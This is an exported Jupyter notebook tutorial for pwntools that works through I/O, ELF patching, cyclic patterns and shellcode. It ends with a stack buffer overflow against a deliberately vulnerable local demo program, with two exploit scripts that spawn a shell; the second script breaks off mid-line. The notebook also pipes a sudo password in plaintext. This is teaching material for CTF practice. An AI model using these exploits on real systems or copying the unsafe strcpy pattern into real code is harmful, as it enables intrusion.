# Pwntools Python Framework

- Complete Tutoraials found here: [https://github.com/Gallopsled/pwntools-tutorial](https://github.com/Gallopsled/pwntools-tutorial)
- Documentation on Pwntools found here: [https://docs.pwntools.com/en/stable/about.html](https://docs.pwntools.com/en/stable/about.html)


- this notebook provides quick tutorials and demos on most common tasks used in basic binary exploitations

## Pwntools Introduction

- a grab-bag of tools to make exploitation during CTFs as painless as possible, and to make exploits as easy to read as possible
- makes it easy to do a local exploit, remote exploit or exploit over SSH with a one-line change
- has two main main modules: `pwn` and `pwnlib`

### pwn - Toolbox optimized for CTFs

- `import pwn` or ` from pwn import *` - you'll have access to everythin you need to write an exploit
- we'll see pwntools usage and demos specific to CTFs in [CTF](./CTF.ipynb) notebook
- install pwntools with python package manager `pip`

### Caveat
- pwntools is generated for exploiting binary programing written in C and NOT CPP
- for binary written in C++, one has to work a little harder and know underlying basics of pwntools and binary generated by C++ compiler such as g++

### Installation
- install the release version on Linux using the following instructions

In [1]:
%%bash
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

#### help

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ pwn -h                                                                                  2 ⨯
usage: pwn [-h]
           {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
           ...

Pwntools Command-line Interface

positional arguments:
  {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
    asm                 Assemble shellcode into bytes
    checksec            Check binary security settings
    constgrep           Looking up constants from header files. Example: constgrep -c freebsd
                        -m ^PROT_ '3 + 4'
    cyclic              Cyclic pattern creator/finder
    debug               Debug a binary in GDB
    disasm              Disassemble bytes into text format
    disablenx           Disable NX for an ELF binary
    elfdiff             Compare two ELF files
    elfpatch            Patch an ELF file
    errno               Prints out error messages
    hex                 Hex-encodes data provided on the command line or stdin
    phd                 Pwnlib HexDump
    pwnstrip            Strip binaries for CTF usage
    scramble            Shellcode encoder
    shellcraft          Microwave shellcode -- Easy, fast and delicious
    template            Generate an exploit template
    unhex               Decodes hex-encoded data provided on the command line or via stdin.
    update              Check for pwntools updates
    version             Pwntools version

optional arguments:
  -h, --help            show this help message and exit
```

### `from pwn import *` 
- import all the names in global scope

- see all the names imported into global namespace to make your life easier: 
[https://docs.pwntools.com/en/stable/globals.html](https://docs.pwntools.com/en/stable/globals.html)

## Tubes
- need to talk to the target binary in order to `pwn` it!
- pwntools makes it a breeze...
- unlike other Python libraries, pwn doesn't seem to work directly on Jupyter Notebook that uses IPython
- let's use Python prompt on termial to demostrate some quick one liners for basic io
- see details: https://github.com/Gallopsled/pwntools-tutorial/blob/master/tubes.md
    

```bash

┌──(kali㉿K)-[~/EthicalHacking]
└─$ python                                                                                127 ⨯
Python 3.8.5 (default, Sep  4 2020, 07:30:14) 
[GCC 7.3.0] :: Anaconda, Inc. on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> sh = process('sh')
[x] Starting local process '/usr/bin/sh'
[+] Starting local process '/usr/bin/sh': pid 16126

```

In [1]:
from pwn import *

In [8]:
sh = process('sh')

[x] Starting local process '/usr/bin/sh'
[+] Starting local process '/usr/bin/sh': pid 638449


####  Basic IO
- `recv(n)` - Recieves any number of available bytes
- `recvline()` - Receives data until a newline is encountered
- `recvuntil(delim)` - Receives data until a delimeter is encountered
- `send(data)` - Sends data
- `sendline(data)` - Sends data plus a newline char
- `clean()` - Discard all buffered data

```bash
>>> sh.sendline(b'sleep 3; echo Hello World!;')
>>> print(sh.recvline())
b'Hello World!\n'
```

In [9]:
sh.sendline(b'sleep 3; echo hello world')

In [10]:
sh.recvline()

b'hello world\n'

In [11]:
sh.sendline(b'echo $((2+10))')

In [12]:
print(sh.recvline().decode('utf-8'))

12



#### Interactive sessions
- let's pretend you land a shell on some remote server
- interactive mode doesn't work on Jupyter Notebook
- see script examples in `pwntools-demos/basic_io` folder

```bash
>>> sh.interactive()
[*] Switching to interactive mode

whoami  
kali
date
Fri 18 Dec 2020 12:28:44 PM MST

exit
[*] Got EOF while reading in interactive

[*] Process '/bin/sh' stopped with exit code 0 (pid 16145)
[*] Got EOF while sending in interactive
```

- compile `pwntools-demos/basic_io/io_demo.cpp` file
- manually run the file first then run the following pwn_io_demo.py script to automatically interact with the binary

In [16]:
! cat pwntools-demos/basic_io/io_demo.cpp

#include <iostream>
#include <string>

using namespace std;

int main() {
    string name, address;
    int age;
    cout << "Enter your name:\n";
    getline(cin, name);
    cout << "Enter your age:\n";
    cin >> age;
    cout << "Enter your address:\n";
    cin >> ws;
    getline(cin, address);
    cout << "Hello, " << name << "! "
     << "Your're " << age << " old. "
     << "Your address is " << address << endl;
    cout << "Good bye!\n";
    return 0;
}

In [9]:
%%bash
input="pwntools-demos/basic_io/io_demo.cpp"
output="io_demo.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [19]:
! cp pwntools-demos/basic_io/pwn_io_demo.py .

In [20]:
! cat pwn_io_demo.py

#!/usr/bin/env python

import pwn

# run process to interact with
io = pwn.process('./io_demo.exe')

# programmatically receive and use data

prompt = io.recvline(False)
print(f'prompt:  {prompt}')
# receives bytes array
if prompt.endswith(b'name:'):
    io.sendline(b"John Smith")

prompt = io.recvuntil(b"age:")
print(f"prompt = {prompt}")
# can only send bytes and string
io.sendline(b'21')

prompt = io.recvuntil(b"address:")
print(f"prompt = {prompt}")

io.sendline(b"111 North Street GJ CO 1111!")
print(f'{io.recv()}') # receive and discard \n
print(f'{io.recvline()}') # includes \n
print(io.recvline().decode('utf-8'), end='')

#io.interactive()


In [21]:
! python pwn_io_demo.py

[x] Starting local process './io_demo.exe'
[+] Starting local process './io_demo.exe': pid 2878576
prompt:  b'Enter your name:'
prompt = b'Enter your age:'
prompt = b'\nEnter your address:'
b'\n'
b"Hello, John Smith! Your're 21 old. Your address is 111 North Street GJ CO 1111!\n"
Good bye!
[*] Stopped process './io_demo.exe' (pid 2878576)


## Utility Functions
- half of Pwntools is utility functions so that you no longer need to copy paste things
- see here - https://github.com/Gallopsled/pwntools-tutorial/blob/master/utility.md

### Packing and Unpacking Integers

- integers such as memory addresses need to be sent to the target program according to it's endianness (x86 is little endian)
- pwntools can detect and automatically pack and unpack integers according to the endianness of the target program

- `pack()` - create word-size (4 bytes) packed (endian-aware) integer
    - help(pack)
- `unpack()` - unpacks a word-size integer (endian-aware)
    - help(unpack)
- `p32()` - pack an integer as 32-bit binary value
    - help(p32)
- `u32()` - unpack packed binary into integer value
    - help(u32)
- also has API to pack and unpack into 8, 16, 64-bit, and archetecture specific integer representations

In [13]:
help(pack)

Help on function pack in module pwnlib.util.packing:

pack(number, word_size=None, endianness=None, sign=None, **kwargs)
    pack(number, word_size = None, endianness = None, sign = None, **kwargs) -> str
    
    Packs arbitrary-sized integer.
    
    Word-size, endianness and signedness is done according to context.
    
    `word_size` can be any positive number or the string "all". Choosing the
    string "all" will output a string long enough to contain all the significant
    bits and thus be decodable by :func:`unpack`.
    
    `word_size` can be any positive number. The output will contain word_size/8
    rounded up number of bytes. If word_size is not a multiple of 8, it will be
    padded with zeroes up to a byte boundary.
    
    Arguments:
        number (int): Number to convert
        word_size (int): Word size of the converted integer or the string 'all' (in bits).
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (str): Signe

In [15]:
pack(1)

b'\x01\x00\x00\x00'

In [14]:
help(unpack)

Help on function unpack in module pwnlib.util.packing:

unpack(data, word_size=None)
    unpack(data, word_size = None, endianness = None, sign = None, **kwargs) -> int
    
    Packs arbitrary-sized integer.
    
    Word-size, endianness and signedness is done according to context.
    
    `word_size` can be any positive number or the string "all". Choosing the
    string "all" is equivalent to ``len(data)*8``.
    
    If `word_size` is not a multiple of 8, then the bits used for padding
    are discarded.
    
    Arguments:
        number (int): String to convert
        word_size (int): Word size of the converted integer or the string "all" (in bits).
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (str): Signedness of the converted integer (False/True)
        kwargs: Anything that can be passed to context.local
    
    Returns:
        The unpacked number.
    
    Examples:
        >>> hex(unpack(b'\xaa\x55', 16, endian='little', s

In [16]:
unpack(b'\x01\x00\x00\x00')

1

In [17]:
p32(1)

b'\x01\x00\x00\x00'

In [19]:
p32(2**32-1)

b'\xff\xff\xff\xff'

In [20]:
p32(1, endian='big')

b'\x00\x00\x00\x01'

In [21]:
p16(1)

b'\x01\x00'

In [22]:
p64(1)

b'\x01\x00\x00\x00\x00\x00\x00\x00'

In [23]:
p32(0xdeadbeef, endian='big')

b'\xde\xad\xbe\xef'

In [24]:
ret_add = add = p32(0xdeadbeef) # little endian

In [25]:
ret_add

b'\xef\xbe\xad\xde'

In [26]:
print(u32(ret_add))

3735928559


In [27]:
hex(u32(ret_add))

'0xdeadbeef'

## ELFs
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/elf.md
- `ELF` class makes it easy to interact with ELF files

```bash
>>> from pwn import *
>>> ELF('/bin/bash')
[*] '/bin/bash'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled
ELF('/bin/bash')

```

### Using Symbols
- ELF files have several sets of symbols available
- symbols are contained in respective dictionary `{name: data}`
    - ELF.symbols - lists all known symbols, including those below. Preference is given the PLT entries over GOT entries.
    - ELF.got - only contains GOT entries
        - Global Offsets Table - used to resolve addresses
    - ELF.plt only contains PLT entries
        - Procedure Linkage Table is used to call external procedures/functions whose address isn't known in the time of linking, and is left to be resolved by the dynamic linker at run time
    - ELF.functions - only contains functions (requires DWARF symbols)
- more on PLT and GOT read [this](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html)
- Let's compile and and read ELF of `pwntools-demos/basic_exploit/vuln.cpp` program

In [7]:
! cat pwntools-demos/demo.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <iostream>
using namespace std;

void get_shell() {
    system("sh");
}

void bad() {
    char buffer[64];
    printf("Enter some text: ");
    cin >> buffer;
    printf("You entered: %s\n", buffer);
}

int main(int argc, char** argv) {
    printf("Welcome... Enter to continue.\n");
    cin.get();
    system("clear");
    bad();
    printf("Good bye!\n");
    return 0;
}


In [2]:
%%bash
input="pwntools-demos/demo.cpp"
output="demo.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [3]:
# let's find the address of get_shell using nm program
! nm demo.exe | grep get_shell

08049306 t _GLOBAL__sub_I__Z9get_shellv
080491b6 T _Z9get_shellv


In [4]:
from pwn import *

In [5]:
e = ELF('./demo.exe')

[*] '/home/kali/projects/SoftwareSecurity/demo.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments


In [34]:
# let's see all the symbols; a python dictionary
e.symbols

{'_ZStrsIcSt11char_traitsIcEERSt13basic_istreamIT_T0_ES6_PS3_': 134517617,
 '_IO_stdin_used': 134520836,
 '__abi_tag': 134513100,
 'deregister_tm_clones': 134517024,
 'register_tm_clones': 134517088,
 '__do_global_dtors_aux': 134517152,
 'completed.0': 134529080,
 '__do_global_dtors_aux_fini_array_entry': 134528768,
 'frame_dummy': 134517200,
 '__frame_dummy_init_array_entry': 134528760,
 '_ZStL8__ioinit': 134529081,
 '_Z41__static_initialization_and_destruction_0ii': 134517453,
 '_GLOBAL__sub_I__Z9get_shellv': 134517542,
 '__FRAME_END__': 134521568,
 '__GNU_EH_FRAME_HDR': 134520924,
 '_DYNAMIC': 134528772,
 '__init_array_end': 134528768,
 '__init_array_start': 134528760,
 '_GLOBAL_OFFSET_TABLE_': 134529024,
 '__x86.get_pc_thunk.ax': 134517762,
 '_edata': 134529080,
 '_Z9get_shellv': 134517206,
 'data_start': 134529072,
 '_fp_hw': 134520832,
 'main': 134517335,
 '_Z3badv': 134517249,
 '__dso_handle': 134529076,
 '_fini': 134517880,
 '_dl_relocate_static_pie': 134516992,
 '__x86.get_pc_

In [42]:
e.functions

{'_ZStrsIcSt11char_traitsIcEERSt13basic_istreamIT_T0_ES6_PS3_': Function(name='_ZStrsIcSt11char_traitsIcEERSt13basic_istreamIT_T0_ES6_PS3_', address=0x8049371, size=0x91, elf=ELF('/home/kali/projects/SystemSecurity/demo.exe')),
 '_Z41__static_initialization_and_destruction_0ii': Function(name='_Z41__static_initialization_and_destruction_0ii', address=0x80492cd, size=0x59, elf=ELF('/home/kali/projects/SystemSecurity/demo.exe')),
 '_GLOBAL__sub_I__Z9get_shellv': Function(name='_GLOBAL__sub_I__Z9get_shellv', address=0x8049326, size=0x24, elf=ELF('/home/kali/projects/SystemSecurity/demo.exe')),
 '_Z9get_shellv': Function(name='_Z9get_shellv', address=0x80491d6, size=0x2b, elf=ELF('/home/kali/projects/SystemSecurity/demo.exe')),
 'main': Function(name='main', address=0x8049257, size=0x76, elf=ELF('/home/kali/projects/SystemSecurity/demo.exe')),
 '_Z3badv': Function(name='_Z3badv', address=0x8049201, size=0x56, elf=ELF('/home/kali/projects/SystemSecurity/demo.exe')),
 '_dl_relocate_static_pi

In [38]:
print('{:#010x}'.format(e.symbols['main']))

0x08049257


In [40]:
print('{:#010x}'.format(e.got['printf']))

0x0804c01c


In [41]:
print('{:#010x}'.format(e.plt['printf']))

0x08049070


In [43]:
print('{:#010x}'.format(e.functions['main'].address))

0x08049257


In [45]:
get_shell = e.symbols.get('_Z9get_shellv')

In [48]:
print(f'{get_shell:#010x}')

0x080491d6


In [51]:
# programmatically find the address of get_shell function
for key in e.functions:
    if 'get_shell' in key:
        print(f'{key} {e.functions[key].address:#010x}')

_GLOBAL__sub_I__Z9get_shellv 0x08049326
_Z9get_shellv 0x080491d6


### Reading ELF Files
- interact with ELF as if it were loadded into memory
- use `read`, `write`, `pack`, `unpack`, `disasm`, etc. methods to interact

In [52]:
get_shell = e.symbols.get('_Z9get_shellv')

In [53]:
print('{:#010x}'.format(get_shell))

0x080491d6


In [54]:
# read 14 bytes from starting of get_shell() location
e.read(get_shell, 14)

b'U\x89\xe5S\x83\xec\x04\xe8 \x02\x00\x00\x05\x1e'

In [32]:
# print 4 bytes from the beginning of the e's address in memory
print(e.read(e.address, 4))

b'\x7fELF'


In [55]:
print(e.disasm(get_shell, 14))

 80491d6:       55                      push   ebp
 80491d7:       89 e5                   mov    ebp, esp
 80491d9:       53                      push   ebx
 80491da:       83 ec 04                sub    esp, 0x4
 80491dd:       e8 20 02 00 00          call   0x8049402
 80491e2:       05                      .byte 0x5
 80491e3:       1e                      push   ds


### Patching ELF Files
- modify/patch ELF files
- let's modify `clear` with `sh` to get a shell

In [22]:
e = ELF('./demo.exe')

In [23]:
# returns an iterator
e.search(b'clear')

<generator object ELF.search at 0x7fffd15ed310>

In [24]:
hex(next(e.search(b'clear')))

'0x804a04c'

In [25]:
e.read(0x804a04c, 5)

b'clear'

In [26]:
e.write(next(e.search(b'clear')), b'sh\x00')

In [27]:
e.save('./demo_mod.exe')

In [28]:
! ls -al ./demo_mod.exe

-rw-r--r-- 1 kali kali 32712 Apr  7 11:15 ./demo_mod.exe


In [29]:
! chmod +x ./demo_mod.exe

In [70]:
! ls -al ./demo_mod.exe
# run the demo_mod.exe from a terminal

-rwxr-xr-x 1 kali kali 33792 Mar 27 12:09 ./demo_mod.exe


### Generating Unique Cyclic sequences
- inorder to find offset, we need to generate a cyclic pattern long enough to crash the target program by over-writing the caller's return address

- `cyclic(length, n)` - Generates a length of the sequence that should be `n` character unique
- `cyclic_find(subsequence, n)` - Finds subsequence that's `n` bytes unique; return positive index for -1 (if subsequence not found)

- create a cyclic pattern of of size 20 with 8 unique character

```bash
>>> cyclic(20, n=8)
b'aaaaaaaabaaaaaaacaaa'
```

- search 8 a's subsequence in cyclic pattern

```bash
>>> cyclic_find('aaaaaaaa', n=8)
0

```

### Core dump and offset
- see `pwntools_demos/core_files` to find offset from core dump files

In [32]:
cyclic(20, n=8)

b'aaaaaaaabaaaaaaacaaa'

In [33]:
cyclic_find('aaaaaaaa', n=8)

0

### Shellcode
- pwntools provide shellcraft module to generate shellcode

- list available shellcode

```bash
$ shellcraft --help
$ shellcraft -l
$ shellcraft -l | grep i386.linux

```

- running a shellcode

```bash
┌──(kali㉿K)-[~]
└─$ shellcraft -r i386.linux.sh    
[!] Your binutils version is too old and may not work!
    Try updating with: https://docs.pwntools.com/en/stable/install/binutils.html
    Reported Version: "GNU assembler (crosstool-NG 1.23.0.444-4ea7) 2.31.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nThis program is free software; you may redistribute it under the terms of\nthe GNU General Public License version 3 or later.\nThis program has absolutely no warranty.\nThis assembler was configured for a target of `x86_64-conda_cos6-linux-gnu'."
[*] '/tmp/pwn-asm-f0hjebqe/step3-elf'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8049000)
    RWX:      Has RWX segments
[+] Starting local process '/tmp/pwn-asm-f0hjebqe/step3-elf': pid 22485
[*] Switching to interactive mode
$ whoami
kali
$ 
```

## Basic exploit code development

- we'll use `pwntools-demos/basic_exploit/vuln.cpp` file to demonstrate the basic exploit generation with pwntools

In [73]:
! cat pwntools-demos/basic_exploit/vuln.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

void get_shell() {
    system("sh");
}

void bad(char * data) {
    char buffer[64];
    strcpy(buffer, data);
    printf("%s\n", buffer);
}

int main(int argc, char** argv) {
    bad(argv[1]);
}

- goal is to get the program execute `get_shell()` by overflowing the caller's return address in `bad()`
- let's see an example that uses gdb-peda and pwntools first, then we'll see an example using only pwntools

In [34]:
%%bash
input="pwntools-demos/basic_exploit/vuln.cpp"
output="pwntools-demos/basic_exploit/vuln_cpp.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [41]:
# run the target program passing "Hello World!" argument
! ./pwntools-demos/basic_exploit/vuln_cpp.exe "Hello World!"

Hello World!


In [43]:
# find offset using gdb-peda
! gdb -q --batch --command=./pwntools-demos/basic_exploit/find_offset.batch --args \
./pwntools-demos/basic_exploit/vuln_cpp.exe

Set 1 arguments to program
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
Use 'set logging enabled off'.

Use 'set logging enabled on'.

[----------------------------------registers-----------------------------------]
EAX: 0xc9 
EBX: 0x41413341 ('A3AA')
ECX: 0xf7e1e9b8 --> 0x0 
EDX: 0x1 
ESI: 0x804bf04 --> 0x8049140 (<__do_global_dtors_aux>:	endbr32)
EDI: 0xf7ffcb80 --> 0x0 
EBP: 0x65414149 ('IAAe')
ESP: 0xffffbc00 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------

In [37]:
! nm pwntools-demos/basic_exploit/vuln_cpp.exe | grep get_shell

08049176 T _Z9get_shellv


In [36]:
# let's see the exploit code
! cat pwntools-demos/basic_exploit/exploit_vuln.py

#! /usr/bin/env python

from pwn import *

target_name = './vuln_cpp.exe'

offset = 76 #FIXME
# find address of get_hell function
get_shell = p32(0x08049176) #b"\x82\x91\x04\x08" # FIXME
payload = b'A'*offset+get_shell
print(f'{payload} has length {len(payload)}')

# run target program with the payload as an argument
io = process([target_name, payload])

# Get a shell!
io.sendline(b'id')
print(io.recvline())

# get interactive shell
io.interactive()


- run the exploit
- get the shell!

```bash
┌──(kali㉿K)-[~/EthicalHacking/pwntools-demos/basic_exploit]
└─$ python exploit_vuln.py 
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08' has length 80
[+] Starting local process './vuln_cpp.exe': pid 17369
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08\n'
[*] Switching to interactive mode
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
$ 
$ whoami
kali
$ date
Fri 18 Dec 2020 01:52:03 PM MST
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 17369)
[*] Got EOF while sending in interactive
```

### Exploit code with only pwntools API
- no gdb, and peda required for generating simple exploits
- we can use core dump to automatically find the offset and the controlled return address using pwntools
- check and set the coredump settings
- try it on terminal if jupyter notebook doesn't work
- NOTE- if the vulnerable target program is `setuid` you must run the exploit code with sudo so the core can be accessed by the script

In [1]:
# check if the kernel can store coredump of a program crash
# if it's 0, set it to unlimited
! ulimit -c

0


In [3]:
! ulimit -c unlimited

In [3]:
# jupyter notebook still says 0; check it on the terminal
! ulimit -c

0


In [1]:
# check the coredump location and pattern
! cat /proc/sys/kernel/core_pattern

core


In [2]:
# if it' not core, set it to store the coredump as core in the working directory
! echo kali | sudo -S sysctl -w kernel.core_pattern=core

In [3]:
# check the coredump location and pattern again and make sure its core
! cat /proc/sys/kernel/core_pattern

core


In [9]:
# -a option gives you all the settings
! ulimit -a

-t: cpu time (seconds)              unlimited
-f: file size (blocks)              unlimited
-d: data seg size (kbytes)          unlimited
-s: stack size (kbytes)             8192
-c: core file size (blocks)         0
-m: resident set size (kbytes)      unlimited
-u: processes                       17240
-n: file descriptors                4096
-l: locked-in-memory size (kbytes)  562360
-v: address space (kbytes)          unlimited
-x: file locks                      unlimited
-i: pending signals                 17240
-q: bytes in POSIX msg queues       819200
-e: max nice                        0
-r: max rt priority                 0
-N 15:                              unlimited


In [8]:
# double check to make sure file name the vale of core_pattern is core
! cat /proc/sys/kernel/core_pattern

core


In [3]:
! cat pwntools-demos/basic_exploit/exploit_vuln_cpp.py

#! /usr/bin/env python

# https://docs.pwntools.com/en/stable/elf/corefile.html

from pwn import *

target_name = './vuln_cpp.exe'
# Set up pwntools for the correct architecture
exe = context.binary = ELF(target_name)

#print(exe.symbols)

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128, n=8)

# Run the process once so that it crashes
p = process([target_name, payload])
p.wait() # wait for close

# Get the core dump
core = Coredump('./core')

# Our cyclic pattern should have been used as the crashing address, make sure!
#assert p32(core.eip) in payload

offset = cyclic_find(core.read(core.esp, 8), n=8) - 4
#print('offset=', offset)
# search for get_shell function address
# in C; func_address = exe.symbols.get_shell
# in C++; parse the symbols dictionary to look for function name in key
for symbol in exe.symbols.keys():
    if symbol.find("get_shell") >=0:
        func_address = exe.symbols[symbol]
        break

#print(hex(func_address))

payload = 

- for the above exploit code, everything needed to exploit the prgram is automatically determined using pwntools API except for the target program name

- run the exploit and enjoy the shell

```bash
                                                                                           
┌──(kali㉿K)-[~/EthicalHacking/pwntools-demos/basic_exploit]
└─$ python exploit_vuln_cpp.py

[*] '/home/kali/EthicalHacking/pwntools-demos/basic_exploit/vuln_cpp.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './vuln_cpp.exe': pid 17482
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 17482)
[+] Parsing corefile...: Done
[*] '/home/kali/EthicalHacking/pwntools-demos/basic_exploit/core'
    Arch:      i386-32-little
    EIP:       0x61616161
    ESP:       0xffffc340
    Exe:       '/home/kali/EthicalHacking/pwntools-demos/basic_exploit/vuln_cpp.exe' (0x8049000)
    Fault:     0x61616161
[+] Starting local process './vuln_cpp.exe': pid 17485
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08\n'
[*] Switching to interactive mode
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
$ 
$ whoami
kali
$ date
Fri 18 Dec 2020 01:59:45 PM MST
$ exit
```